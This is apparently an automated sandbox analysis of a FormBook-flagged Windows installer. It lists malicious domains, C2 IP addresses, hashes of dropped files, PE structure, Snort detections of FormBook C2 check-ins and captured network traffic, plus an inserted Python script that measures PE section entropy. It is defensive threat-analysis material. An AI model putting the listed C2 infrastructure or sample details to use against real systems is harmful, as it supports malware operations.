Match | Associated Sample Name / URL | Detection | Context
www.iccsukltd.com | EQ034989.exe | malicious | 217.160.0.33
www.affiliatemarketingproducts.xyz | EQ034989.exe | malicious | 172.67.184.156
www.affiliatemarketingproducts.xyz | cat#U00e1logo de productos2021.exe | malicious | 172.67.184.156

                                                ASN

Match | Associated Sample Name / URL | Detection | Context
SAKURA-A SAKURA Internet Inc JP | iSBX2z1os7.exe | malicious | 153.126.211.112
SAKURA-A SAKURA Internet Inc JP | EQ034989.exe | malicious | 153.127.214.206
SAKURA-A SAKURA Internet Inc JP | Port_UETQYDYA_99381,pdf.exe | malicious | 133.242.249.12
SAKURA-A SAKURA Internet Inc JP | GF2QHRMI1t | malicious | 153.127.220.234
SAKURA-A SAKURA Internet Inc JP | mirai.x86 | malicious | 153.120.181.224
SAKURA-A SAKURA Internet Inc JP | 10xR6hubAN | malicious | 133.125.49.243
SAKURA-A SAKURA Internet Inc JP | 1cG7fOkPjS.exe | malicious | 153.127.214.165
SAKURA-A SAKURA Internet Inc JP | index_2021-09-21-20_06 | malicious | 153.120.48.218
SAKURA-A SAKURA Internet Inc JP | 8U5snojV8p.exe | malicious | 153.126.210.205
SAKURA-A SAKURA Internet Inc JP | W53ieNnm24 | malicious | 133.242.220.190
SAKURA-A SAKURA Internet Inc JP | LhMC14F4r6 | malicious | 133.242.202.122
SAKURA-A SAKURA Internet Inc JP | WR5MZql7vp | malicious | 153.125.128.242
SAKURA-A SAKURA Internet Inc JP | ivMI3veipP.exe | malicious | 153.127.71.68
SAKURA-A SAKURA Internet Inc JP | 4dIxGwjniI | malicious | 153.121.193.216
SAKURA-A SAKURA Internet Inc JP | 8gQIIxr1sN | malicious | 133.125.13.8
SAKURA-A SAKURA Internet Inc JP | o3ZUDIEL1v | malicious | 153.127.220.238
SAKURA-A SAKURA Internet Inc JP | xwKdahKPn8.exe | malicious | 153.126.211.112
SAKURA-A SAKURA Internet Inc JP | 395d57a0_by_Libranalysis.exe | malicious | 153.126.165.175
SAKURA-A SAKURA Internet Inc JP | QUOTE B1020363.PDF.exe | malicious | 133.242.249.176
SAKURA-A SAKURA Internet Inc JP | TION.pdf.exe | malicious | 133.242.249.176
DIGITALOCEAN-ASN US | h3SFZEdlT0.dll | malicious | 165.227.90.171
DIGITALOCEAN-ASN US | 61Wq3BOwiA.exe | malicious | 188.166.46.127
DIGITALOCEAN-ASN US | gXswKQATrt.dll | malicious | 64.225.74.183
DIGITALOCEAN-ASN US | #Uc81c#Ud488 #Uce74#Ud0c8#Ub85c#Uadf823.exe | malicious | 104.248.163.187
DIGITALOCEAN-ASN US | 1oT4BWF7Gl | malicious | 206.189.84.209
DIGITALOCEAN-ASN US | iSBX2z1os7.exe | malicious | 165.227.252.190
DIGITALOCEAN-ASN US | 5FjM13QB8F.exe | malicious | 46.101.121.244
DIGITALOCEAN-ASN US | sora.x86 | malicious | 157.230.1.123
DIGITALOCEAN-ASN US | fe0WPoEanm | malicious | 206.189.51.168
DIGITALOCEAN-ASN US | Hilix.arm | malicious | 45.55.195.228
DIGITALOCEAN-ASN US | wt5i2fAcF0 | malicious | 167.99.122.255
DIGITALOCEAN-ASN US | uohdbohpYb | malicious | 139.59.170.186
DIGITALOCEAN-ASN US | jygLuGmfJ2.exe | malicious | 157.230.28.192
DIGITALOCEAN-ASN US | rzMvWQOGAE.exe | malicious | 165.22.84.147
DIGITALOCEAN-ASN US | JSUAd0NPag.exe | malicious | 157.230.28.192
DIGITALOCEAN-ASN US | gqTrv5VEem.exe | malicious | 159.89.128.13
DIGITALOCEAN-ASN US | SecuriteInfo.com.Suspicious.Win32.Save.a.4727.dll | malicious | 104.248.155.133
DIGITALOCEAN-ASN US | SecuriteInfo.com.Suspicious.Win32.Save.a.31095.dll | malicious | 104.248.155.133
DIGITALOCEAN-ASN US | SecuriteInfo.com.Suspicious.Win32.Save.a.28634.dll | malicious | 104.248.155.133
DIGITALOCEAN-ASN US | SecuriteInfo.com.Suspicious.Win32.Save.a.12010.dll | malicious | 104.248.155.133

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

C:\Users\user\AppData\Local\Temp\hx6dizitwtz0f0aat
Process: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
File Type: data
Category: dropped
Size (bytes): 215803
Entropy (8bit): 7.994628213154947
Encrypted: true
SSDEEP: 6144:1JIHtqEX3rWyncHSnlF1rYZYlz8gT6t+jGR:rwtbFncHc1cES+jGR
MD5: 61C9526BC0572C9F55C5C8A52AA67AC4
SHA1: AAF907310F5A183328EC227BF2906F27574C55AB
SHA-256: 07AD9970509EAE7E01E04D18A115D789DF7670118F0A987F8A83270C42B6497A
SHA-512: 5542F3A7D19984BBF21940E64BC0C37D3ECE44942D7BECAD81F3F5E4E9180762E937A1AD3DB92EFF15F2440A0E65C09458B7D4397C2E77400E78FA1F39C205F6
Malicious: false
Reputation: low
                                                Preview: .'........|.....9a.v....^..]l.q.;/E=@W%.....-.......r).....[.WjN...YYt..V-..M.w.x...3.R....v_.7.....Y.k`.J..&..?..p..zge...'7x.t.v*M.g!.@,..Z..`..W8...I"4..A"....1...u.aQ{{#a...-"Z.......0.0.D.....RL.3..w39R......9.c.D.X.d.m.W.tdK.:...PR.JY...4:.qB...............xaxF...Q@Hnl.q.1/E.@W%...n.-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T....?..i.#a._.v".yG.\.V.0.0.D...X......s.........9..nD.J.d.=VW.tlK.4....R..Y...4:..B.......j.......xaaF...G@Hll.q.;/E=@W%.....-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T.....aQ{{#a.-".CG.\...0.0.D...X......w..R......9..nD.J.d.=VW.tlK.4....R..Y...4:..B.......j.......xaaF...G@Hll.q.;/E=@W%.....-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T.....aQ{{#a.-".CG.\...0.0.D...X......w..R......9..nD.J.d
C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll
Process: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 88064
Entropy (8bit): 6.428072489806541
Encrypted: false
SSDEEP: 1536:coflsP2XNvIZy4K+PBtk7iHyX3SWzwQ9cIbUfs44UVxY2Qz:coOPkvLz+vk7Z+VxI
MD5: CC4DEBEED38EA20DB5A0D2AFA03EFBEA
SHA1: 873E13909531B81E8B1DBDFBB8BC2AE317F73563
SHA-256: 6E7DC09D3A59CC7391C009BD8F8A70360CEBAFE87E817E44CD359A935DBF2617
SHA-512: 994E3BBB97B2B17C9A3A1DECBDB6FCEEBCA48F0384C85D568261736B42F3FF716AFA9A94511BEF5A4A2A1975651FE4F007EEC93C338381F596B47C1122658236
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 14%
Reputation: low
                                                Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...P..a...........!................aG..............................................................................,2..L...x4......................................................................h...H...........(8...............................text............................... ..`.rdata..dX.......Z..................@..@.data...$E...P...$...2..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.512989604965828
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: nowy przyk#U0142adowy katalog.exe
File size: 422298
MD5: cbe0e49106fad96b2c1c155ce5b22abd
SHA1: 25a9a38c80446b631fc1de30440caba41ff8ec74
SHA256: a13cc23d40c93805a7305e090f5faf55d60b440e6d674ac333980ecd6c94bc60
SHA512: 013931e807edc454697dab78f81c54a3c1433970916ae2ca91dee03e03a04d1ae19b32eccd05fd44c5492a3b6c0c5080aeaaaba8329c5ca2b3cc39cb2c1c5f67
SSDEEP: 6144:68LxBzme9UeFrAmvGfHHolKxTcE0RAF1r1qzXRgT6t+jZadV1ACLSDBQqK07:c3eFrAmv1lQApm1wz2S+jZyr8K07
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                                File Icon

Icon Hash: 70c8d0e0ccd4f0d0

                                                Static PE Info

                                                General

Entrypoint: 0x40312a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
TLS Callbacks: none
CLR (.Net) Version: none
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b76363e9cb88bf9390860da8e50999d2

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebx
                                                mov dword ptr [esp+14h], 00409168h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B0h]
                                                call dword ptr [004070ACh]
                                                cmp ax, 00000006h
                                                je 00007FBC547D84F3h
                                                push ebx
                                                call 00007FBC547DB2D4h
                                                cmp eax, ebx
                                                je 00007FBC547D84E9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00407280h
                                                push esi
                                                call 00007FBC547DB250h
                                                push esi
                                                call dword ptr [00407108h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FBC547D84CDh
                                                push 0000000Dh
                                                call 00007FBC547DB2A8h
                                                push 0000000Bh
                                                call 00007FBC547DB2A1h
                                                mov dword ptr [0042EC24h], eax
                                                call dword ptr [00407038h]
                                                push ebx
                                                call dword ptr [0040726Ch]
                                                mov dword ptr [0042ECD8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 00429058h
                                                call dword ptr [0040715Ch]
                                                push 0040915Ch
                                                push 0042E420h
                                                call 00007FBC547DAED4h
                                                call dword ptr [0040710Ch]
                                                mov ebp, 00434000h
                                                push eax
                                                push ebp
                                                call 00007FBC547DAEC2h
                                                push ebx
                                                call dword ptr [00407144h]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7524 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x1fcb8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e66 | 0x6000 | False | 0.670572916667 | data | 6.44065573436 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x12a2 | 0x1400 | False | 0.4455078125 | data | 5.0583287871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x25d18 | 0x600 | False | 0.458984375 | data | 4.18773476617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x37000 | 0x1fcb8 | 0x1fe00 | False | 0.38359375 | data | 5.99100948906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
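The per-section Entropy column in this table and the Entropy (8bit) / Encrypted fields on the dropped files above are the same measurement: 8-bit Shannon entropy, where the 215803-byte blob hx6dizitwtz0f0aat scores 7.99 and is flagged Encrypted while the installer's own .rsrc sits at 5.99. The .ndata row is also worth reading: raw size 0x0 but virtual size 0x8000, the uninitialized data section an NSIS stub reserves and fills at run time. The script below is an added example written for this page, not Joe Sandbox code and not code from the sample. It walks a PE's section table, computes the entropy of each section's raw bytes, applies the whole-file Encrypted verdict, and reports the two things a triager wants to see from the table alone (runtime-filled sections and compressed-or-encrypted ones). The PE it analyses is constructed in memory, and the 7.2 threshold is an assumption rather than the sandbox's value.

```python
import hashlib
import math
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumed threshold (not the sandbox's): bytes this close to 8 bits/byte are
# uniformly distributed, which in practice means compressed or encrypted.
ENCRYPTED_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def looks_encrypted(data: bytes) -> bool:
    """The whole-file Encrypted true/false verdict, applied to a dropped file's bytes."""
    return shannon_entropy(data) >= ENCRYPTED_THRESHOLD


def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section table, one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symtab, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size            # section headers follow the optional header
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _r, _l, _nr, _nl, flags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "entropy": shannon_entropy(raw), "flags": flags,
        })
    return sections


def assess_sections(pe: bytes) -> list:
    """Section-table findings a triager wants before running anything."""
    findings = []
    for s in parse_sections(pe):
        name, flags = s["name"], s["flags"]
        if s["raw_size"] == 0 and flags & IMAGE_SCN_CNT_UNINITIALIZED_DATA:
            findings.append(f"{name}: uninitialized, 0x{s['virtual_size']:x} bytes allocated at load time")
        elif s["raw_size"] == 0 and s["virtual_size"]:
            findings.append(f"{name}: no raw data but 0x{s['virtual_size']:x} virtual bytes, filled at runtime")
        if s["entropy"] >= ENCRYPTED_THRESHOLD:
            findings.append(f"{name}: entropy {s['entropy']:.2f}, compressed or encrypted")
        if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{name}: writable and executable")
    return findings


def _section_header(name, vsize, va, raw_size, raw_ptr, flags):
    return struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, flags)


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image for the demo (not the sample from this report)."""
    text = (b"This program cannot be run in DOS mode.\r\n" * 13)[:0x200]
    # A SHA-256 hash chain stands in for a packed payload: pseudo-random, deterministic.
    payload = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 0x1000 bytes
    headers = [
        _section_header(b".text", 0x1F0, 0x1000, 0x200, 0x200,
                        IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        _section_header(b".data", 0x1000, 0x2000, 0x1000, 0x400,
                        IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        _section_header(b".ndata", 0x8000, 0x3000, 0, 0,
                        IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(headers), 0, 0, 0, 0xE0, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * 0xDE              # PE32 magic, rest zeroed
    head = dos + b"PE\0\0" + coff + optional + b"".join(headers)
    head += b"\0" * (0x200 - len(head))
    return head + text + payload


if __name__ == "__main__":
    pe = build_sample_pe()
    for s in parse_sections(pe):
        print(f"{s['name']:<8} vsize=0x{s['virtual_size']:<6x} raw=0x{s['raw_size']:<6x} entropy={s['entropy']:.2f}")
    for finding in assess_sections(pe):
        print("finding:", finding)
```

Run it against a real file by replacing build_sample_pe() with open(path, "rb").read(). Two caveats when reading the numbers: entropy is computed over raw bytes only, so a section like .ndata with no raw data always reads 0.0 regardless of what lands there at run time, and a high-entropy verdict says nothing about which algorithm produced the bytes (zlib output and an RC4 stream look alike to this measure).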

                                                Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x37280 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
RT_ICON | 0x47aa8 | 0x6f7a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x4ea28 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x52c50 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x551f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x562a0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x56708 | 0x100 | data | English | United States
RT_DIALOG | 0x56808 | 0x11c | data | English | United States
RT_DIALOG | 0x56928 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x56988 | 0x5a | data | English | United States
RT_MANIFEST | 0x569e8 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                Imports

DLL | Imports
KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation system | Country where language is spoken
                                                English | United States

                                                Network Behavior

                                                Snort IDS Alerts

                                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                11/04/21-11:49:10.345950 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49760 | 34.102.136.180 | 192.168.2.6
                                                11/04/21-11:49:15.409408 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                11/04/21-11:49:15.409408 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                11/04/21-11:49:15.409408 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                11/04/21-11:49:15.526365 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49766 | 34.102.136.180 | 192.168.2.6
                                                11/04/21-11:49:26.412220 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                11/04/21-11:49:26.412220 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                11/04/21-11:49:26.412220 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49773 | 80 | 192.168.2.6 | 153.127.214.206

                                                Network Port Distribution

                                                TCP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 4, 2021 11:49:10.211590052 CET | 49760 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:10.230325937 CET | 80 | 49760 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:10.230520010 CET | 49760 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:10.230787992 CET | 49760 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:10.249495029 CET | 80 | 49760 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:10.345949888 CET | 80 | 49760 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:10.346048117 CET | 80 | 49760 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:10.346096039 CET | 49760 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:10.346160889 CET | 49760 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:10.659367085 CET | 49760 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:10.678026915 CET | 80 | 49760 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:15.391933918 CET | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:15.408896923 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:15.409070969 CET | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:15.409408092 CET | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:15.426412106 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:15.526365042 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:15.526426077 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:15.526756048 CET | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:15.526823044 CET | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:15.831765890 CET | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                Nov 4, 2021 11:49:15.850500107 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.6
                                                Nov 4, 2021 11:49:20.565169096 CET | 49770 | 80 | 192.168.2.6 | 217.160.0.33
                                                Nov 4, 2021 11:49:20.587682009 CET | 80 | 49770 | 217.160.0.33 | 192.168.2.6
                                                Nov 4, 2021 11:49:20.590507030 CET | 49770 | 80 | 192.168.2.6 | 217.160.0.33
                                                Nov 4, 2021 11:49:20.590734005 CET | 49770 | 80 | 192.168.2.6 | 217.160.0.33
                                                Nov 4, 2021 11:49:20.613791943 CET | 80 | 49770 | 217.160.0.33 | 192.168.2.6
                                                Nov 4, 2021 11:49:20.613830090 CET | 80 | 49770 | 217.160.0.33 | 192.168.2.6
                                                Nov 4, 2021 11:49:20.613846064 CET | 80 | 49770 | 217.160.0.33 | 192.168.2.6
                                                Nov 4, 2021 11:49:20.614064932 CET | 49770 | 80 | 192.168.2.6 | 217.160.0.33
                                                Nov 4, 2021 11:49:20.616709948 CET | 49770 | 80 | 192.168.2.6 | 217.160.0.33
                                                Nov 4, 2021 11:49:20.639265060 CET | 80 | 49770 | 217.160.0.33 | 192.168.2.6
                                                Nov 4, 2021 11:49:26.100131035 CET | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                Nov 4, 2021 11:49:26.411873102 CET | 80 | 49773 | 153.127.214.206 | 192.168.2.6
                                                Nov 4, 2021 11:49:26.412035942 CET | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                Nov 4, 2021 11:49:26.412220001 CET | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                Nov 4, 2021 11:49:26.716120005 CET | 80 | 49773 | 153.127.214.206 | 192.168.2.6
                                                Nov 4, 2021 11:49:26.820693016 CET | 80 | 49773 | 153.127.214.206 | 192.168.2.6
                                                Nov 4, 2021 11:49:26.911021948 CET | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                Nov 4, 2021 11:49:27.061523914 CET | 80 | 49773 | 153.127.214.206 | 192.168.2.6
                                                Nov 4, 2021 11:49:27.061583996 CET | 80 | 49773 | 153.127.214.206 | 192.168.2.6
                                                Nov 4, 2021 11:49:27.061712027 CET | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                Nov 4, 2021 11:49:27.064249992 CET | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                Nov 4, 2021 11:49:27.218399048 CET | 80 | 49773 | 153.127.214.206 | 192.168.2.6
                                                Nov 4, 2021 11:49:27.219957113 CET | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                Nov 4, 2021 11:49:36.965390921 CET | 49774 | 80 | 192.168.2.6 | 172.67.184.156
                                                Nov 4, 2021 11:49:36.988444090 CET | 80 | 49774 | 172.67.184.156 | 192.168.2.6
                                                Nov 4, 2021 11:49:36.988626003 CET | 49774 | 80 | 192.168.2.6 | 172.67.184.156
